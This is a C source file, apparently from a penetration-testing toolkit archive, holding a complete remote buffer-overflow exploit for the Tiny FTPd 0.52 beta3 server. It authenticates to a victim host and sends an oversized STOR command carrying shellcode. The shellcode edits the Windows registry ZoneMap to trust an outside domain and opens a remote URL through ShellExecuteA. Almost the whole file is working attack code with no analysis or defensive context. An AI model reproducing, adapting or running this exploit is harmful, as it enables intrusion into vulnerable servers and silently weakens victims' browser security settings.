home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / tftp / tiny / tftpdex.c

< prev

Wrap

C/C++ Source or Header  |  2005-02-12  |  7KB  |  206 lines

---

1. /*=========================================================================
2. ====
3.    Tiny FTPd 0.52 beta3 exploit
4.    The Shadow Penguin Security (http://shadowpenguin.backsection.net)
5.    Written by UNYUN (shadowpenguin@backsection.net)
6.   =========================================================================
7. ====
8. */
9.  
10. #include    <stdio.h>
11. #include    <string.h>
12. #include    <windows.h>
13. #include    <winsock.h>
14.  
15. #define     FTP_PORT        21
16. #define     MAXBUF          2000
17. #define     MAXPACKETBUF    32000
18. #define     RETADR          268
19. #define     JMPESP_1        0xff
20. #define     JMPESP_2        0xe4
21. #define     NOP             0x90
22. #define     KERNEL_NAME     "kernel32.dll"
23.  
24. static unsigned char exploit_code[1000]={
25. 0xEB,0x67,0x5F,0x33,0xC0,0x88,0x47,0x0C,0x88,0x47,0x18,0x88,0x47,0x26,0x88,
26. 0x47,
27. 0x34,0x88,0x47,0x43,0x88,0x47,0x51,0x88,0x47,0x56,0x89,0x47,0x57,0x33,0xDB,
28. 0xB3,
29. 0xB8,0x03,0xDF,0x88,0x03,0x43,0x88,0x43,0x07,0x88,0x43,0x20,0x57,0xB8,0x50,
30. 0x77,
31. 0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x19,0x03,0xDF,0x53,0x56,0xB8,
32. 0x28,
33. 0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xD2,0xB2,0x5B,0x03,0xD7,0x52,0xBA,0xFF,0xFF,
34. 0xFF,
35. 0xFF,0x52,0x33,0xC9,0x51,0x33,0xD2,0xB2,0x63,0x03,0xD7,0x52,0xB1,0x01,0xC1,
36. 0xE1,
37. 0x1F,0x80,0xC9,0x03,0x51,0xFF,0xD0,0xEB,0x02,0xEB,0x5B,0x33,0xDB,0xB3,0x27,
38. 0x03,
39. 0xDF,0x53,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xD2,0xB2,0x5F,0x03,
40. 0xD7,
41. 0x52,0x33,0xD2,0xB2,0xB9,0x03,0xD7,0x52,0x33,0xD2,0xB2,0x5B,0x03,0xD7,0x8B,
42. 0x1A,
43. 0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x35,0x03,0xDF,0x53,0x56,0xB8,0x28,0x6E,0xF7,
44. 0xBF,
45. 0xFF,0xD0,0x33,0xC9,0xB1,0x04,0x51,0x33,0xD2,0xB2,0x57,0x03,0xD7,0x52,0x51,
46. 0x33,
47. 0xD2,0x52,0x33,0xD2,0xB2,0x52,0x03,0xD7,0x52,0x33,0xD2,0xB2,0x5F,0x03,0xD7,
48. 0x8B,
49. 0x1A,0x53,0xFF,0xD0,0xEB,0x02,0xEB,0x38,0x33,0xDB,0xB3,0x0C,0xFE,0xC3,0x03,
50. 0xDF,
51. 0x53,0xB8,0x50,0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x44,0x03,
52. 0xDF,
53. 0x53,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x01,0x53,0x33,
54. 0xDB,
55. 0x53,0x53,0x33,0xC9,0xB1,0xC1,0x03,0xCF,0x51,0x53,0x53,0xFF,0xD0,0x90,0xEB,
56. 0xFD,
57. 0xE8,0xFD,0xFE,0xFF,0xFF,0x00};
58.  
59. #define WORKAREA    \
60. "advapi32.dll*shell32.dll*RegOpenKeyExA*RegCreateKeyA*"\
61. "RegSetValueExA*ShellExecuteA*http*000011112222.DEFAULT"\
62. "\\Software\\Microsoft\\Windows\\CurrentVersion"\
63. "\\Internet Settings\\ZoneMap\\Domains\\*"
64.  
65. #define DOMAIN  "backsection.net"
66. #define URL     "http://shadowpenguin.backsection.net/ocx/sample.html"
67.  
68. unsigned int search_mem(unsigned char *st,unsigned char *ed,
69.                 unsigned char c1,unsigned char c2)
70. {
71.     unsigned char   *p;
72.     unsigned int    adr;
73.  
74.     for (p=st;p<ed;p++)
75.         if (*p==c1 && *(p+1)==c2){
76.             adr=(unsigned int)p;
77.             if ((adr&0xff)==0) continue;
78.             if (((adr>>8)&0xff)==0) continue;
79.             if (((adr>>16)&0xff)==0) continue;
80.             if (((adr>>24)&0xff)==0) continue;
81.             return(adr);
82.         }
83.     return(0);
84. }
85.  
86. main(int argc,char *argv[])
87. {
88.     SOCKET               sock;
89.     SOCKADDR_IN          addr;
90.     WSADATA              wsa;
91.     WORD                 wVersionRequested;
92.     unsigned int         i,kp,ip,p1,p2,p;
93.     unsigned int         pretadr;
94.     static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
95.     struct hostent       *hs;
96.     MEMORY_BASIC_INFORMATION meminfo;
97.  
98.     if (argc<3){
99.         printf("usage: %s VictimHost UserName Password\n",argv[0]);
100.         exit(1);
101.     }
102.     if ((void *)(kp=(unsigned int)LoadLibrary(KERNEL_NAME))==NULL){
103.         printf("Can not find %s\n",KERNEL_NAME);
104.         exit(1);
105.     }
106.  
107.     VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
108.     pretadr=0;
109.     for (i=0;i<meminfo.RegionSize;i++){
110.         p=kp+i;
111.         if ( ( p     &0xff)==0
112.           || ((p>>8 )&0xff)==0
113.           || ((p>>16)&0xff)==0
114.           || ((p>>24)&0xff)==0) continue;
115.         if (*((unsigned char *)p)==JMPESP_1 && *(((unsigned char *)p)+1)==
116. JMPESP_2) pretadr=p;
117.     }
118.     printf("RETADR         : %x\n",pretadr);
119.     if (pretadr==0){
120.         printf("Can not find codes which are used by exploit.\n");
121.         exit(1);
122.     }
123.  
124.     wVersionRequested = MAKEWORD( 2, 0 );
125.     if (WSAStartup(wVersionRequested , &wsa)!=0){
126.         printf("Winsock Initialization failed.\n"); return -1;
127.     }
128.     if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
129.         printf("Can not create socket.\n"); return -1;
130.     }
131.     addr.sin_family     = AF_INET;
132.     addr.sin_port       = htons((u_short)FTP_PORT);
133.     if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
134.             if ((hs=gethostbyname(argv[1]))==NULL){
135.                 printf("Can not resolve specified host.\n"); return -1;
136.             }
137.             addr.sin_family = hs->h_addrtype;
138.             memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
139.     }
140.     if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
141.         printf("Can not connect to specified host.\n"); return -1;
142.     }
143.     recv(sock,packetbuf,MAXPACKETBUF,0);
144.     sprintf(packetbuf,"user %s\r\n",argv[2]);
145.     send(sock,packetbuf,strlen(packetbuf),0);
146.     recv(sock,packetbuf,MAXPACKETBUF,0);
147.     sprintf(packetbuf,"pass %s\r\n",argv[3]);
148.     send(sock,packetbuf,strlen(packetbuf),0);
149.     recv(sock,packetbuf,MAXPACKETBUF,0);
150.  
151.     memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
152.  
153.     ip=pretadr;
154.     buf[RETADR  ]=ip&0xff;
155.     buf[RETADR+1]=(ip>>8)&0xff;
156.     buf[RETADR+2]=(ip>>16)&0xff;
157.     buf[RETADR+3]=(ip>>24)&0xff;
158.  
159.     p1=(unsigned int)GetProcAddress((HINSTANCE)kp,"LoadLibraryA");
160.     p2=(unsigned int)GetProcAddress((HINSTANCE)kp,"GetProcAddress");
161.  
162.     printf("LoadLibraryA   : %x\n",p1);
163.     printf("GetProcAddress : %x\n",p2);
164.     if ( ( p1     &0xff)==0
165.       || ((p1>>8 )&0xff)==0
166.       || ((p1>>16)&0xff)==0
167.       || ((p1>>24)&0xff)==0
168.       || ( p2     &0xff)==0
169.       || ((p2>>8 )&0xff)==0
170.       || ((p2>>16)&0xff)==0
171.       || ((p2>>24)&0xff)==0){
172.         printf("NULL code is included.\n");
173.         exit(1);
174.     }
175.     exploit_code[0x28]=strlen(DOMAIN);
176.     exploit_code[0x2B]=strlen(URL)+strlen(DOMAIN)+1;
177.     exploit_code[0xf5]=strlen(DOMAIN)+186;
178.  
179.     exploit_code[0x2e]=exploit_code[0xd2]=p1&0xff;
180.     exploit_code[0x2f]=exploit_code[0xd3]=(p1>>8)&0xff;
181.     exploit_code[0x30]=exploit_code[0xd4]=(p1>>16)&0xff;
182.     exploit_code[0x31]=exploit_code[0xd5]=(p1>>24)&0xff;
183.     exploit_code[0x3f]=exploit_code[0x74]=p2&0xff;
184.     exploit_code[0x40]=exploit_code[0x75]=(p2>>8)&0xff;
185.     exploit_code[0x41]=exploit_code[0x76]=(p2>>16)&0xff;
186.     exploit_code[0x42]=exploit_code[0x77]=(p2>>24)&0xff;
187.     exploit_code[0x9c]=exploit_code[0xe3]=p2&0xff;
188.     exploit_code[0x9d]=exploit_code[0xe4]=(p2>>8)&0xff;
189.     exploit_code[0x9e]=exploit_code[0xe5]=(p2>>16)&0xff;
190.     exploit_code[0x9f]=exploit_code[0xe6]=(p2>>24)&0xff;
191.  
192.     strcat(exploit_code,WORKAREA);
193.     strcat(exploit_code,DOMAIN);
194.     strcat(exploit_code,"*");
195.     strcat(exploit_code,URL);
196.  
197.     memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
198.  
199.     sprintf(packetbuf,"stor %s\r\n",buf);
200.     send(sock,packetbuf,strlen(packetbuf),0);
201.     Sleep(3000);
202.     closesocket(sock);
203.     printf("Done.\n");
204.     return FALSE;
205. }
206.